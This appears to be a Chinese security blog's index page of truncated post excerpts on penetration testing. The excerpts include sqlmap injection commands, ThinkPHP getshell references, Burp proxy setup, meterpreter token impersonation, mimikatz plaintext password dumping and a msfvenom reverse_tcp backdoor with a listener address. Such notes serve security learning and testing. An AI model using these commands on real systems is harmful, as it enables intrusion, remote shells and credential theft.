摘要:
sqlmap -u “http://url/news?id=1〃 –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1〃 –current-db #获取当前数 据库名称sqlmap -u “http://www.xxoo.co 阅读全文
摘要:
最后更新:2018年06月02日11:49:30 代码审计: 一次thinkphp挖矿cms的失败代码审计 [【转载】] ThinkPHP5 SQL注入漏洞 ThinkPHP 5.0.10-3.2.3 缓存函数设计缺陷可导致 Getshell (评论区也有干货) ThinkPHP框架 5.0.x s 阅读全文
摘要:
在模拟器中设置代理,长按WiredSSID会弹出菜单: 点击修改网络: 显示高级选项打勾,然后设置代理ip,也就是你运行burp的机器ip: 然后导出burp的证书: 设置保存的路径和文件名: 模拟器左边栏点击设置共享: 模拟器内会自动打开这个目录: 然后单击这个证书文件,设置证书名字: 会提示已安 阅读全文
该文被密码保护。 阅读全文
摘要:
令牌(token)相当于系统的临时密钥(账号及密码) 加载incognito模块 meterpreter> use incognito meterpreter > list_tokens -u //列出可用令牌 meterpreter > impersonate_token WIN-xxxxxxxx 阅读全文
摘要:
获取 Windows 明文用户名密码 git clone https://github.com/gentilkiwi/mimikatz.git load mimikatz privilege::debug sekurlsa::logonPasswords full Python shell pyth 阅读全文
摘要:
生成exe后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.131 lport=4444 -f exe -o 4444.ex 传到测试机执行后得到反弹shell msfconsole msf > use multi/han 阅读全文
摘要:
cat <<EOF ************************************* * 即 将 进 行 的 操 作 * * 4. mysql -- mysql 安装 * ************************************* EOF cd /rootwget http 阅读全文